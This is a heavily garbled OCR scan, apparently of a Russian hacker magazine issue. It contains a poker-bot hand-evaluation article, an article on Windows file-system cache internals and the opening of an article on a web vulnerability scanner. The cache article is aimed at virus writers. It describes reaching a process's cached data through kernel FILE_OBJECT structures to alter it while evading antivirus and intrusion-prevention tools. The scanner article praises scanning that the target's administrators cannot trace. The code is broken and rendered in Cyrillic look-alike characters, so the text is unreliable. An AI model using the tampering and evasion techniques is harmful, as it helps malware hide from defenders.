((Ьоагсі == пиіі) I I (Ьоагсі . ІепдРЬ == 0)) { 

аІІСагсі = п еѵ7 іпР [ііапсі . ІепдРЬ] ; 

ЗузРет . аггаусору (ііапсі , 0 , аІІСагсі , 0 , ііапсі . ІепдРЬ) ; 

} еізе { 

аІІСагсі = пеѵ7 іпР [ііапсі . ІепдРЬ + Ьоагсі . ІепдРЬ] ; 
ЗузРет. аггаусору (ііапсі, 0 , аІІСагсі, 0 , ііапсі. ІепдРЬ) ; 
ЗузРет. аггаусору (Ьоагсі, 0 , аІІСагсі , ііапсі . ІепдРЬ, 
Ьоагсі . ІепдРЬ) ; 

} 

іпР [ ] сагсі = пем іпР [аІІСагсі. ІепдРЬ] ; 

[] зиіРе = пеы іпР [ аІІСагсі . ІепдРЬ] ; 

[] зиіРеСоипР = пеѵг іпР[4]; 
зогРНапсі (аІІСагсі , сагсі, зиіРе, зиіРеСоипР); 

( ізКоуаІРІизЬ (сагсі, зиіРе, зиіРеСоипР 
) ! = -1) ( 
те г. о гг. 117; 

} 

іпР гезиІР = ізЗРгаідЬРРІизЬ ( сагсі , зиіРе, 
зиіРеСоипР) ; 

.і.Р (гезиІР ! = -1) { 

104 + гезиІР; 

} 

гезиІР = ізОиасіз (сагсі) ; 
і Г (гезиІР ! = -1 ) { 

геРигп 91 + гезиІР; 

} 

гезиІР = ізРиІІНоизе ( сагсі) ; 

II (гезиІР ! = -1) { 

геРигп 78 + гезиІР; 

} 

гезиІР = ізРІизЬ (сагсі, зиіРе, зиіРеСоипР); 

ІР (гезиІР ! = -1) { 

еі ігп 65 + гезиІР; 

} 

гезиІР = ізЗРгаідЬР (сагсі) ; 

ІР (гезиІР ! = -1) { 

52 + гезиІР; 

} 

гезиІР = ізЗеР (сагсі) ; 

ІР (гезиІР ! = -1) { 

геРигп 39 + гезиІР; 

} 

гезиІР = ізТѴоРаіг (сагсі) ; 

(гезиІР ! = -1) { 

геРигп 26 + гезиІР; 

} 

гезиІР = ізОпеРаіг ( сагсі) ; 

ІР (гезиІР ! = -1) { 

13 + гезиІР; 

} 

геР и гг. і зііі дііСагсІ ( сагсЗ ) ; 



СИЛЫ КОМБИНАЦИИ 



} 

ІР ( (ііапсі [ 3 ] % 13 == ііапсі [з + 1] % 13) && 
(ііапсі [| ] < ЬапЬ[з + 1] ) ) { 

Р = ііапсі [ з + 1 ] ; 
ііапсі [ з + 1 ] = ііапсі [ з ] ; 
ііапсі [ з ] = Р ; 

} 
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ССЮІЫб 



} 

} 

іог (іпі і = 0; і < Папсі. ІепдіЬ.; і + +) { 

сагс![і] = Ъ.апс1[і] % 13; 
зиііе[і] = НапсЦі] / 13; 
зиііеСоипі [ зиііе [ і ] ] ++ ; 

} 

} 

Рассмотрим алгоритмы определения комбинаций (код приводить не 
буду, так как он достаточно тривиален и его всегда можно найти на 
диске): 

ізНідЬСагсі 

Возвращаем первую карту массива. 

ізОпеРаіг 

Ищем две одинаковые карты, идущие подряд, и возвраща- 
ем достоинство этих карт . 

ізТтооРаіг 

Ищем две одинаковые карты, идущие подряд, ищем еще 
две одинаковых карты и из двух достоинств этих карт 
возвращаем максимальное . 

ізЗеі 

Ищем три одинаковые карты, идущие подряд, и возвраща- 
ем достоинство этих карт . 

ізЗігаідЬі 

Подсчитываем, сколько карт подряд идет с убывани- 
ем достоинства. Если таких карт пять, то возвращаем 
достоинство старшей. 

ізРІизЪ 

Проверяем, чтобы было пять карт одной масти, и воз- 
вращаем достоинство старшей карты этой масти. 

ІзРиІІНоизе 

Ищем три карты одного достоинства и еще две одинако- 
вые карты. Возвращаем достоинство трех карт. 

ізОиасІз 

Ищем две карты одного достоинства, идущие подряд. 
Возвращаем достоинство этих карт. 

ізЗігаідЬіРІизІі 

Проверяем, чтобы было пять или более карт одной 
масти, и чтобы эти карты шли по порядку. Возвращаем 
достоинство старшей карты. 

ізКоуаІРІизЬ 

Проверяем, чтобы в комбинации были Туз, Король, Дама, 
Валет, 10, 9 одной масти. Возвращаем 12 (порядковый 

номер достоинства туза) . 

Кстати, еще можно оптимизировать определение комбинации — 
совместить проверку нескольких комбинаций в одной функции 
(например, проверку на две пары и пару), изменить кодирование 
(представление) карт в программе, перенести эти функции на С и 
скомпилировать в пабѵе библиотеку и т.д. Но все эти методы умень- 
шают наглядность кода, кроме того на данный момент скорость 
вычислений вполне приемлема, поэтому пока оставляем все как 
есть. 

Функция определения силы комбинации 

іпі деіСотЪіпаііоп ( іпі [ ] Папб, іпі [ ] Ьоагб) { 

[] аІІСагб; 

і! ( (Ьоагб == пиіі) I I (ЬоагсН ІепдіЬ. == 0) ) { 

аІІСагб = п ем іпі [Папб. ІепдіН] ; 

Зузіет. аггаусору (Напсі, 0 , аІІСагб, 0 ,НапсН ІепдіН) ; 

} еізе { 

аІІСагб = пем іпі [Папб. ІепдіЪ. + Ьо аг б. ІепдіЬ.] ; 
Зузіет. аггаусору (Ьапб, 0 , аІІСагб, 0 ,Ьапб. ІепдіЬ) ; 
Зузіет. аггаусору (Ьоагб, 0 , аІІСагб, Ьапб. ІепдіЬ, 




Ьоагб. ІепдіЬ) ; 

} 

[] сагб = пеѵ7 іпі [аИСагсН ІепдіЬ] ; 

[] зиііе = пем іпі [аІІСагб . ІепдіЬ] ; 

[] зиііеСоипі = пем іпі [4]; 
зогіНапб (аІІСагб, сагб, зиііе, зиііеСоипі); 

І2 (ізКоуаІРІизЬ (сагб, зиііе, зиііеСоипі) != -1) { 

геіигг 117; 

} 

іпі гезиіі = ізЗігаідЬіРІизЬ (сагб, зиііе, 
зиііеСоипі) ; 
іі (гезиіі ! = -1) { 

геіигп 104 + гезиіі; 

} 

гезиіі = ізОиабз (сагб) ; 
іі (гезиіі != -1) { 

геіигп 91 + гезиіі; 

} 

гезиіі = ІзРиІІНоизе (сагб) ; 
іі (гезиіі ! = -1) { 

геіигп 78 + гезиіі; 

} 

гезиіі = ізРІизЬ (сагб, зиііе, зиііеСоипі) ; 
іі (гезиіі ! = -1) { 

геіигп 65 + гезиіі; 

} 

гезиіі = ізЗігаідЬі (сагб) ; 
іі (гезиіі != -1) { 

геіигп 52 + гезиіі; 

} 

гезиіі = ізЗеі (сагб) ; 
іі (гезиіі ! = -1) { 

геіигп 39 + гезиіі; 

} 

гезиіі = ізТѴоРаіг (сагб) ; 
іі (гезиіі != -1) { 

геіигп 26 + гезиіі; 

} 

гезиіі = ізОпеРаіг (сагб) ; 
іі (гезиіі != -1) { 

геіиг 13 + гезиіі; 

} 

геіигп ізНідЬСагб (сагб) ; 

} 

Далее сделаем функцию, которая возвращает абсолютную силу карточ- 
ной комбинации (я назвал ее деЮотЬіпабоп]. Всего таких разных по 
силе комбинаций будет 1 18: девять комбинаций со старшими картами 
(по 13 старших карт в каждой комбинации), и одна комбинация без 
старшей карты (флеш-рояль, в котором старшая карта — всегда туз) 

— 9x13+1=118. Хотя в комбинации «две пары» может быть только 12 
старших карт (двойка в этой комбинации не может являться старшей), 
чтобы не нарушать порядок, мы это не учитываем. Эта функция нужна 
для последующего удобного сравнения комбинаций между собой — 
она возвращает число, и чем оно больше, тем сильнее комбинация. 



► 094 
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«Я написал простой калькулятор, 
который на основе карт на руках 
и на столе, а также количестве игро- 
ков вычисляет вероятность выигрыша. 
Таких калькуляторов в Сети много и они 
более функциональны» 



Как видно из кода, сначала функция скла- 
дывает карты на руках и карты на столе 
в один массив, потом сортирует его, а 
далее по порядку определяет комбинации. 
Определение идет от сильнейшей комби- 
нации (флеш-рояль) к слабейшей (старшая 
карта). Чтобы комбинации отличались друг 
от друга, они имеют область действия — 
набор значений карт, находящихся в этой 
комбинации. Так, комбинации НідЬ сагб 
(старшая карта) соответствуют значения от 
О до 12, где 0 — это Нідб сагб со старшей 
«двойкой», а 12 — со старшим тузом. А ком- 
бинации «пара» соответствуют значения от 
13 до 25, где 13 — «пара» со старшей «двой- 
кой», а 25 — со старшим тузом. 

И, наконец, сделаем функцию для опреде- 
ления вероятности выигрыша (деіРгоЬа- 
ЬіІТуОМіп). Параметры этой функции следую- 
щие: свои карты, карты на столе (если есть) и 
количество игроков. Далее все просто — раз- 
даем случайные карты остальным игрокам, 
выкладываем карты на стол (если их еще нет 
или не хватает) и проверяем комбинации. 
Если выиграли мы, то увеличиваем коли- 
чество выигранных раундов на 1 (или, если 
есть еще игроки с такими же картами, то на 
1/<количество этих игроков +1>). 

Маленькое замечание по моделированию: 
карты игрокам лучше выдавать случайно, а 
не мешать колоду, а потом выдавать, так как 
в первом случае будет быстрее. 

Алгоритм моделирования 

1) Раздать случайные карты игро- 
кам; 

2 ) Положить случайные карты на 
стол (если на столе еще не пять 
карт) ; 

3 ) Сравнить свою комбинацию с 
комбинациями других игроков ; 

4 ) Если наша комбинация лучшая , 
то прибавляем к количеству выи- 
гранных раундов 1/<количество 
игроков с такой же комбинацией;*; 

5) Повторяем шаги 1-4 нужное 
количество раз; 

6 ) Вероятность выигры- 
ша равна <кол-во выигрышных 
раундов>/<общее кол-во раундов>. 

К коду я приложил ипіі-тесты, так что 
можно сразу проверить работоспособность 
всех методов. 



ЗАКЛЮЧЕНИЕ 

В принципе, описанную вероятность уже 
можно использовать для игры в покер 
в интернете. Можно разыгрывать руки, 
вероятность выигрыша которых достаточ- 
но высока. Для этого я написал простой 
калькулятор, который на основе карт на 
руках и на столе, а также количестве 
игроков вычисляет вероятность выигры- 
ша. Кстати, таких калькуляторов в Сети 
много и они более функциональны. 
Промоделировав ситуацию с несколь- 
кими игроками и одинаковыми картами, 
можно заметить, что с увеличением 



количества игроков вероятность выигры- 
ша уменьшается. Все правильно: чем 
больше игроков, тем больше вероят- 
ность, что у оппонентов карты будут 
лучше, чем у нас. Есть и радостная 
новость — все это уравнивается раз- 
мером банка, поскольку он тоже будет 
больше. Если вспомнить формулу ( р * роі 
= ѵѵіп), то получим уменьшение р с уве- 
личением роС то есть величина ѵѵіп 
остается неизменной. Если ты будешь 
использовать величину р в игре без 
учета размера банка, то ставь количество 
игроков равным 2, чтобы этот параметр 
не влиял на расчет. На этом я предлагаю 
на сегодня закруглиться, а если тебе 
(не)понравилось и ты (не)желаешь про- 
должения темы кодинга покерных ботов 
в следующих ][ — присылай свои отзывы 
мне и редактору рубрики (аіехапбегй 
геаі. хакер. ги]. Если ты, господин наш, 
читатель, изъявишь свое желание, то в 
следующем номере мы опишем несколь- 
ко алгоритмов для принятия решений и 
сделаем симулятор игры в Техаз НоШет 
І\Іо бі т М; Рокег, в котором будут играть 
эти покерные алгоритмы, т 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 

ТРПРГЬПІІ ИНТЕРНЕТ 

I Б Л Б V ГІ ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 

• Подключение - в любом месте Москвы и Московской обл. 

* Срок подключения в Москве - 14 дней, в Московской обл, - от 14 до 30 дней. 
«Установка прямого московского телефонного номера 
* Многоканальные телефонные номера 
* ІР~телофония 

■ Выделенные линии Интернет 
* Корпоративные частные сети (ѴРЫ) 

• Хостинг, услуги Оаіа-центрв 

РД7 Телеком №ѵѵш»гті<ги е-таіЫп1о@гт1«ги (495} 983-8212 

Приглашаем специалистов, имеющих опыт работы в области телекоммуникаций 
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реклама 






Наблюдательный программист может заметить, что разработчики 
ѴѴіпсІоѵѵз отказываются документировать самые вкусные и сочные 
места интерфейса данной ОС. И не напрасно - там скрыты поистине 
бесценные сокровища, от которых, к тому же, зависит безопасное 
функционирование операционной системы. 



Н о, как известно, запретный плод сладок, и поэтому отчаянные 
смельчаки вроде нас с тобой вооружаются дебаггерами, отлад- 
чиками и прочими удивительными изобретениями человечества 
В этой статье поговорим о такой малоизученной, с точки зрения 
системного программиста или вирмейкера, вещи, как кэш файловой 
системы ѴѴі псіоѵѵз. 



НАЧНЕМ-С... 

Итак, что такое кэш ѴѴіпсіоѵѵб? Кэш или, правильнее, кэш файловой 
системы, представляет собой совершенно прозрачную для пользо- 
вателя или программиста систему, которая находится где-то между 
файловой системой и виртуальной памятью ОС. Состоит он из набора 
функций ядра и системных потоков, которые вместе с диспетчером 



► 096 
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Іксі> сіі ПІ!_ѴАСВ 0х86Гасе00 

+0x000 ВазеАсісІгезз : 0x^4680000 
+0x004 ЗЬагесІСасИеМар : 0x86413008 
+0x008 Оѵегіау : иппатесі 

+0x010 1_гииз* : _І_І$Т_ЕМТВѴ [ 0х86ГасГа8 - ОхЭбГасГсО ] 



Данные будут находиться по адресу 0x44680000 



ІксІ> ей _Зес*іоп_оЬ]есІ_роігЛег 0х85е7 а334 
п«_$ЕСТІОМ_ОВОЕСТ_РОІІ\ІТЕК 

+0x000 ОаІаЗесйіопОЬіесІ :0х8563с828 

+0x004 ЗЬагесІСасНеМар :0х862Г5978 

+0x008 ІтадеЗесЙопОЬіесІ : (пиіі) 



Структура 5ЕСТІ0М_0ВЗЕСТ_Р0ІІМТЕР 



памяти обеспечивают кэширование данных для всех 
драйверов файловых систем ѴѴіпсіоѵѵб. В первую очередь 
кэш предназначен для увеличения производительности 
операционной системы за счет локального хранения 
(кэширования] тех данных, к которым часто обращаются 
пользовательские программы и подсистемы ядра ОС, а 
также, соответственно, для снижения количества обраще- 
ний к жесткому диску. И ведь верно — стандартная про- 
цедура ввода-вывода, затрагивающая прямое обращение 
к жесткому диску — довольно трудоемкая операция, как 
с точки зрения скорости/времени, так и с точки зрения 
производительности. И тут дело даже не в скорости вра- 
щения дисков Н00 или пропускной способности шины. 

В современных условиях, когда операционной системе 
приходится выполнять сотни операций в секунду, такой 
подход (прямое чтение/запись данных на жесткий диск 
без использования кэширования данных] выглядит мало- 
действительным. 

Наверное, я не согрешу против истины, заявив, что прак- 
тически вся работа файловой системы так или иначе 
завязана на ее кэше. При этом работает он достаточно 
своеобразно: сначала полностью засоряется, после 
чего начинает освобождать для себя оперативную 
память, сбрасывая рабочие приложения в файл под- 
качки. Это сильно снижает скорость работы системы, 
особенно если на компьютере установлено менее 128 
Мб ОЗУ (интересно, такие еще остались?]. Мириться с 
этим можно, только если на твоей боевой машине не 
меньше гигабайта памяти. Если меньше, то проблема 
оказывается довольно серьезной. У диспетчера кэша 
есть одно необычное свойство — часть кэшируемых 
данных действительно находится в физической памяти. 
Все дело в том, что диспетчер обращается к данным, 
проецируя их представления (тарріпд Гііе) с помощью 
стандартных системных вызовов ѴѴіпАРІ. 



Одной из главных функций диспетчера кэша является 
то, что он должен гарантировать любому процессу, 
который пытается получить кэшируемые данные, 
самую последнюю версию этих данных. Если ты 
серьезно занимаешься программированием, то я уве- 
рен, что ты знаешь об этой проблеме не понаслышке. 
Проблема заключается в одновременном использо- 
вании одних и тех же ресурсов разными процессами 
(потоками]. 

Для общего сведения стоит отметить, что диспетчер 
кэша способен кэшировать не только файлы, но и 
потоки данных — последовательности байтов в файле 
Характерной особенностью кэша также является то, 
что у него нет собственного рабочего набора — он 
использует общий системный набор, в который вхо- 
дят кэш данных, пул подкачиваемой памяти и под- 
качиваемый код ядра и драйверов. Виртуальный 
размер кэша не отображается какими-либо счет- 
чиками производительности, поэтому узнать его 
значение можно только через переменную ядра 
МтЭігеОГЭузіетСасбеІпРадеБ. Обычно его размер 
— 0x20000 страниц, что при странице, равной 4 Кб, 
будет составлять ровно 512 Мб. Для более точно- 
го отображения полного объема файловых данных, 
кэшируемых в системе, стандартный «Диспетчер 
задач» ѴѴіпсІоѵѵз показывает параметр «Системный 
кэш», отражающий суммарный размер системного 
рабочего набора и списков простаивающих и моди- 
фицированных страниц. 

ЛЕЗЕМ ВГЛУБЬ 

Для отслеживания изменений в кэшируемых файлах 
диспетчер кэша использует специальную структу- 
ру — Ѵігіиаі АсМгезз Сопігоі Віоск (ѴАСВ), которая 
описывает каждый 256-килобайтный слот кэша. 




»йуй 

На дискеты най- 
дешь сорцы из ядра 
ѴѴіпсіоѵѵб, реализую- 
щие взаимодействие 
с кэшем, сорцы 
драйверов, которые 
реализуют указа иные 
в статье фичи, а также 
много других вкус- 
ностей. 
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Для совершенство- 
вания своих навы- 
ков работы с файло- 
вым кэшем ѴѴіпсіоѵѵб 
советую посетить 

ѴѴѴѴѴѴ.ОБГОПІІПе.СОПП . 

Несмотря на то, что 
общее направле- 
ние сайта — про- 
граммирование 
в ядре, большая 
часть материалов 
посвящена разра- 
ботке драйверов 
и фильтров файловых 
систем. Ксожалению, 
на английском. 
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Как и всегда, для раз- 
работки драйверов 
и их отладки, качай 
последнюю версию 
ѴѴЭК- 

Ы:і:р://сІоѵѵпІоасІ. 
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Показатель размера системного кэша в ѴѴіпсІоѵѵз 



При загрузке системы диспетчер забирает часть неподкачивае- 
мой памяти системы под свои нужды, то есть под размещение 
ѴАСВ. Адрес массива ѴАСВ сохраняется в переменной СсѴасЬз. 
При запросе на чтение данных из какого-либо файла дис- 
петчер кэша должен ответить на два вопроса: находится 
ли файл в кэше, и какие ѴАСВ ссылаются на запрошенный 
адрес. Другими словами, диспетчер должен выяснить, прое- 



цируется ли представление файла на системный кэш. Для 
учета представлений данного файла диспетчер кэша поддер- 
живает специальный массив указателей на ѴАСВ. Далее углу- 
бляться в структуру кэша не имеет смысла, она слишком слож- 
на, и для ее описания просто не хватит ни места, ни времени. 
Если интересно, отсылаю тебя к книге «Внутреннее устройство 
ѴѴіпсІоѵѵз» от признанных знатоков этой операционной системы 
М.Руссиновича и Д. Соломона. 

Разработчику система предоставляет ряд переменных и функ- 
ций, непосредственно связанных с системным кэшем. Самые 
интересные из них — это переменная МппЗузІетСасбеЗіагІ:, 
которая указывает на начальный виртуальный адрес кэша, и 
МтЗузіетСасНеЕпсІ, указывающая на его конечный адрес. 
МтВузІетСасЬеѴѴз вернет нам суммарный размер системного 
рабочего набора. Вопрос лишь в том, как получить значение 
этих переменных. Их (как и кучу других не менее интересных 
переменных, от которых зависит работа системы] можно найти 
в структуре КООЕВІІ60ЕП_ВАТА32. Если лень искать в Сети, 
можешь покопаться на диске — там лежат сорцы драйвера, 
который реализует нужный тебе код и может показывать значе- 
ния редких системных переменных. 

Основные функции работы с системным кэшем — СсСоруВеаб, 

С с С о руѴѴгі 1;е и их более быстрые аналоги СсРазіСоруРеасІ 
и СсЕазіСоруѴѴгіІе. Отличие этих функций в том, что 
СсРазіСоруРеасІ и СсРазѣСоруѴѴгіІіе ограничены использованием 
32-разрядных смещений внутри файла и синхронного чтения/ 
записи. 

Диспетчер кэша вызывается драйвером файловой системы с 
помощью указанных функций. К примеру, при операции чтения 
через вызов функций СсСоруВеасІ (СсРазЕСоруРеасІ] диспетчер 
создает представление файла в кэше для проецирования части 
запрошенного файла (Еіе тарріпд) и считывает файловые дан- 
ные в пользовательский буфер, копируя их из представления. 
Поскольку драйверы файловых систем выполняются в ядре, 
они могут модифицировать данные, находящиеся в систем- 
ном кэше, только с уведомления диспетчера кэша. Для этого 
предусмотрены такие функции как СсМарОаІа, СсРіпРеасІ, 
СсРгерагеРіпѴѴгііе и др. , которые позволяют находить и моди- 
фицировать данные в виртуальной памяти без использования 
промежуточных буферов. 



Экспорт системных функции ядра для работы с кэшем 



— 1 : .1 — 

* РЕ € 
Ш03с 

іі ; м 


- - - ИЛССЛЩ. 

(хроі'С ііігес 
Ш0Ш0Й098 
00092О06 


аі оІГзе! 00181000 (іі 11п апе = пЬо 
СсСап ! І/г Не 
Со СоруКеасІ 


сі-у міилі м .слс г . — — 

1 . ехе > 


Ш03е 


0000а2?а 


СсСоруНгПе 1 




0000а7ес 


СсСеРеИігіІе 




III МП 


0009258а 


Сс Рас^СоруНеасІ 




0041 


0000а5ае 


СсРасіСоруУг Не 




0042 


000825с4 


Сс РазіПгіІЯеаеШа іі 




0043 


0Ш08 25 с с 


Сс Рас і Не асЖо і Ро с с іЫе 




0044 


000825(14 


СсРасіКеаіШаіІ 




0045 


000ШЙ1 а4 


Сс Р Іи с ЬСас Ье 




0046 


0000(1са4 


СсСеіВігіуРадес 




004? 


0000е414 


СсСеіР іІеОЪлесіРготВсЪ 




0048 


0000«3с1е 


Сс Се 1 Р і 1е ОЬ л е с 1 Р го п8 есііопРі* % $ 




0049 


00006020 


Сс Се 1 Р 1ц с іі в <і М а 1 і с! Ра 1 а 




004а 


0000а ( 2с 


СсСеіЬсп РогР і ІеОЬлес і; 




004Ь 


0000е598 


Ссіпіі іаІігеСасЬеМар 




004с 


0000(1е88 


Сс 1 зТЬегеЮ ігі уОаІа 




004іі 


0009311а 


СеНарОаІа 




004е 


0009367с 


СсМгіІНеагі 




004Г 


00093920 


СеМсіІЯеасІСопрІеіе 


и 


ЬгеІр 


і^огІвгіШірвп ИзогЬма ЙБОг^патЦчойе Э 


9 ІЙиіі 



► 098 



ХАКЕР 06 /137/ 10 










Іксі>сК _РіІе_оЬіес* 85й927а8 
п*! РНЕ ОВЛЕСТ 



+0x000 


Туре 


:5 


+0x002 


Зіге 


:1 12 


+0x004 


РеѵісеОЬіес* 


:0х86Ь78е30 


+0x008 


ѴрЬ 


:0х86Ь90сІ80 


+0х00с 


РзСогЛех* 


:0хеЗЬ629е0 


+0x010 


Р$Соп*ех*2 


:0хеЗЬ62938 


+0x017 


$ес*іопОЬіес*Роіп*ег :0х9Ъе7Я334 


+0x018 


_ РгіѵаІеСасІіеМар 


:0х862ШаШХ— 




Указатели на РРІѴАТЕ_САСНЕ_МАР и БесІіопОЬіесІРоіпІег 



Существует три основных метода доступа к кэшируемым дан- 
ным, каждый из которых рассчитан на применение в опреде- 
ленной ситуации: простое копирование, проецирование с 
фиксацией и прямое обращение к физической памяти. 

ПЕРЕХОДИМ К БОЕВЫМ ДЕЙСТВИЯМ 

Ну, мой дорогой друг, после того, как ты получил весомое пред- 
ставление о том, что такое системный кэш, возникает резонный 
вопрос: зачем все это нужно, и как все это можно использовать 
в свои целях? 

Просто поразмысли сам — все данные, которыми процессы 
обмениваются друг с другом, так или иначе будут храниться 
в системном кэше. И если перехватывать напрямую систем- 
ные функции для подмены чего-либо в адресном пространстве 
целевого процесса уже не кошерно, то манипуляции с данными 
процесса без перехвата системных функций заставят серьезно 
озадачиться производителей ЕІРВ’ов, аверов и прочих «мега- 
супер-навороченных» (судя по рекламе] программ. 

И что же делать? Ну, первое, что приходит на ум — перехватить 
системные функции, которые используются диспетчером кэша. 
Все они экспортируются ядром и начинаются с префикса Сс*, 
поэтому тебе не должно составить большого труда пропарсить 
таблицу экспорта и заменить обработчики на свои. Но это не 
есть гуд. Таблицы экспорта ядра, а также важнейших драйве- 
ров, скорее всего будут контролироваться аверами и проактив- 
ками, поэтому их модификация не принесет ничего хорошего. 
Следовательно, перехват функций работы с кэшем будет не 
самым лучшим решением. 

Мы пойдем другим путем — в структуре РІІ_Е_0В^СТ, которая 
создается для каждой инстанции в системе, будь то файл, про- 
цесс или еще что-нибудь, есть указатели на очень интересные 
для нас вещи - это РШѴАТЕ_САСНЕ_МАР и 5НАРЕ0_САСН Е_ 
МАР. РРІѴАТЕ_САСН Е_МАР находится в самой структуре 
Е1ЕЕ_0ВЗЕСТ по смещению 0x18. Далее нам нужно будет в 
РІ И Е_0 В 0 ЕСТ найти структуру ЗесЕюпОЬіесіРоіпіег, которая, в 
свою очередь, по смещению 0x4 содержит указатель на структуру 
5НАРЕ0_САСНЕ_МАР. 



Получаем файловый объекту исследуемого процесса 

ЗесСіопОЬз есС = ( РЗЕСТІ(Ж_ОВЦЕСТ) 

ЕіпсіРгосевзЗесЦіопОЬз еср ( рЕргосезз ) ; 

ІР (МтІзАсІсІгеззѴаІісІ ( ( ( РЗЕСМЕЫТ) ЗесСіопОЬз есС-> 
ЗедшепС) ->СогШгоІАгеа) ) 

{ 

РіІеОЬфесС = ( ( РЗЕСМЕЫТ) ЗесСіопОЬф есС->ЗедшепЦ ) -> 

СопЦгоІАгеа->Рі1еРоіпСег ; 

ЕіІеОЬф есС = ( РРІЬЕ_ОВЦЕСТ) 

( (ІІЬСЖС) ЕіІеОЬф есВ & 0хРРР^РРР8); 

} 

РРІѴАТЕ_САСНЕ_МАР, как таковая, интереса для нас не представ- 
ляет. Более интересной сточки зрения хака является структура 
5НАРЕО_САСНЕ_МАР, потому что именно она по смещению 0x040 
содержит указатель на массив ѴАСВз, принадлежащий данному 
процессу. Получив доступ к ѴАСВ, ты фактически сможешь контро- 
лировать данные, принадлежащие процессу, и при необходимости 
изменять их. Кстати, если интересно, название файла в формате 
Б N I С О О Е_5Т Р I N Ѳ , которому принадлежит РІ БЕ_0 ВО ЕСТ, ты смо- 
жешь найти по смещению 0x030. 

Главная цель, как ты понял из вышесказанного — найти указатель 
РІ БЕ_0 ВО ЕСТ, присущий тому или иному процессу или файлу; он 
содержит в себе все нужные данные. 

Полный вариант кода ты, как всегда, сможешь найти на диске. 

ЗАКЛЮЧЕНИЕ 

В этой статье идет речь о не совсем простых вещах. Для освоения 
материала тебе понадобятся определенные знания и опыт програм- 
мирования в ядре ѴѴіпсІоѵѵз, хотя, как мне кажется, в данной статье 
ничего сложного нет. Маленький совет — если хочешь доскональ- 
но разобраться в работе файловой системы ѴѴіпсІоѵѵз и файлового 
кэша, обязательно прочитай книгу Раджива Нагара «ѴѴі псіоѵѵз І\ІТ 
Рі Іе Бузует Іпіегпаіз». Несмотря на то, что книга 1997 года выпуска, 
своей актуальности она не потеряла до сих пор. 

Удачного компилирования, и да пребудет с тобой Сила! тг 



ХАКЕР 06 /137/ 10 



► 099 




ѴѴЕВ-5ЕРѴІСЕ5: СОЗДАЕМ ОНЛАЙН-СКАНЕР УЯЗВИМОСТЕЙ 

Для приблизительной оценки степени защищенности того или иного 
веб-ресурса мы часто прибегаем к помощи различных сканеров 
уязвимостей - монстро-продуктов, требующих обязательной установки 
на компьютер. В этой статье мы рассмотрим процесс создания 
инструмента, который полностью изменит твое представление 
о проведении аудита веб-приложений. 



Н аиболее полную картину о защищенности той или иной инфра- 
структуры позволяют получить только комплексные методы 
анализа. Если говорить о веб-среде в общем и ее технологиях 
в частности, то подавляющее большинство распространенных 
уязвимостей являются следствием некорректной работы того или иного 
алгоритма фильтрации входящих данных. Не спеши бросать в автора 
камни, описывая причины появления и принципы обнаружения (экс- 
плуатации] уязвимостей типа Х55/50Е-І пі/РН Р-іпсІисІіпд. Несомненно, 
техническая сторона атак подобного типа заметно выделяется и 
направлена на разные объекты, но нас не интересует эксплуатация 
багов. Мы, как примерные аудиторы/пентестеры/администраторы, 
заинтересованы в их обнаружении, а методы обнаружения, в свою 
очередь, можно свести к принципу выявления «внештатных» ситуаций 
в работе фильтров веб-приложения. А это возможно только путем пере- 
дачи фильтру различных входных данных. Кстати, именно так и дей- 
ствуют сканеры уязвимостей (да простят меня их разработчики), анали- 
зируя полученные результаты мощными эвристическими алгоритмами. 
Но имеется ряд ситуаций, когда использование этих инструментов для 
нас нежелательно. Большинство серьезных коммерческих продуктов 
при сканировании целевого ресурса оставляют в логах веб-сервера 
записи, однозначно идентифицирующие факт сканирования, а иногда 
и узел, с которого оно проводилось. Вряд ли кому-то нужна излиш- 



няя «популярность» в кругах администрации целевого сайта. К тому 
же процесс сканирования весьма ресурсоемок и требует временных 
затрат, в некоторых случаях эквивалентных денежным. А теперь при- 
шло время приступить к созданию инструмента, который, в силу своих 
особенностей, не имеет вышеописанных недостатков и будет доступен 
для нас в виде веб-сервиса. 

ГЛАЗАМИ РАЗРАБОТЧИКА 

С позиции разработчика процесс сканирования — однотипная проце- 
дура, которая представляет собой формирование запросов к целевому 
ресурсу и обработку полученных результатов. Договоримся сразу, что 
исследуемый сайт для нас — это некоторое подобие «черного ящика», 
то есть нам неизвестны детали функционирования его скриптов. В 
общем, все как в настоящем тесте на проникновение, где все параме- 
тры, передаваемые исследуемому скрипту, приходится подбирать слу- 
чайным образом, опираясь исключительно на свой опыт и интуицию. 
Почему именно веб-сервис? Да хотя бы потому, что в рунете нет ана- 
логичных приложений «(по крайней мере, на момент сдачи статьи 
— начало апреля — прим. ред.]». А это значит, что данная ниша будет 
интересна как разработчикам, так и пользователям, поскольку теперь 
им не придется устанавливать требовательные к ресурсам и дорогие 
продукты, чтобы просканировать свою домашнюю страничку с целью 
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Широкий набор инструментов для создания веб-приложений 



получить хотя бы приблизительное представление о ее 
защищенности. Другие причины можешь придумать сам, а 
я пока перейду к теоретической части, а затем непосред- 
ственно к кодингу. 

И В ПЕРВЫЙ ДЕНЬ СОЗДАЛ ОН... 

Как я уже отмечал, наша разработка будет представлять 
собой веб-сервис. Попробуем дать более точное опреде- 
ление. ѴѴеЬ-зегѵісе — приложение, которое: 

1) Исполняется на веб-сервере; 

2) Ожидает поступления НТТР-запросов и предоставляет 
веб-методы для их обработки; 

3) Непосредственно исполняет веб-методы и возвращает 
результаты. 

У истоков данной технологии стоит Місгозоіф которая 
реализовала ее в рамках Місгозоіі: .ЫЕТ. Кстати, именно 
веб-сервисы являются основной причиной существова- 
ния .ЫЕТ Егатеѵѵогк: их задача — максимально упростить 
разработку веб-серверов и веб-клиентов. За примерами 
далеко ходить не надо — в предыдущем номере жур- 
нала мы рассмотрели, как с помощью технологии .ЫЕТ 
Петоііпд можно быстро создать сеть распределенных 
вычислений. И все же веб-сервисы — не собственность 
М5. Они являются промышленным стандартом на основе 
открытых протоколов НТТР и 50АР (Зітріе 0Ь]есЕ Ассезз 
Ргоіюсоі]. Именно поэтому их можно писать в любом тек- 
стовом редакторе, однако .ЫЕТ Егатеѵѵогк — несомненно, 
лучший вариант, который значительно упрощает процесс 
кодинга. Кстати, кодить мы будем на языке С#, но ничто 
не мешает тебе писать приложение на любом другом 
языке, поддерживаемым А5Р.ЫЕТ — технологией созда- 
ния веб-приложений от Майкрософт в рамках платформы 
.ЫЕТ. С инструментами разобрались, теперь перейдем к 
проектированию логики приложения. 

Хочу сразу сказать, что процесс создания онлайн-сканера 
